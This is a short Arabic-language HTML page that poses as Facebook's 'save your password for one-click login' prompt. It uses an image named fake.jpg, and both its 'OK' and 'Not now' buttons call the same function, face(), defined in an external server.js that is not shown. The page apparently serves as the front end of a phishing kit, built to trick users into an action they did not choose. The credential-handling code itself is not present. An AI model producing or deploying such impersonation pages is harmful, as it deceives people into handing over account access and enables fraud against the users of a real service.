<!DOCTYPE html>
<html>
  <head>
    <meta http-equiv="content-type" content="text/html; charset=utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="style.css" type="text/css" media="all" />
    <title>فيسبوك</title>

  </head>
  <body>
    <div class="base">
    <h4>تسجيل الدخول بضغطه واحدة</h4>
    <span>يمكنك حفظ كلمة السر الآن اجعل تسجيل الدخول أكثر سهولة</span>
    <br /><br />
    <div class="fase">
      <div><img src="fake.jpg" alt="" /></div>
      <br />
      <div>
      <button id="yes" type="submit" onclick="face()">موافق</button>
      <button id="no" onclick="face()" type="submit">ليس الأن</button>
      </div>
    </div>
    </div>
<script src="server.js" type="text/javascript" charset="utf-8"></script>
  </body>
</html>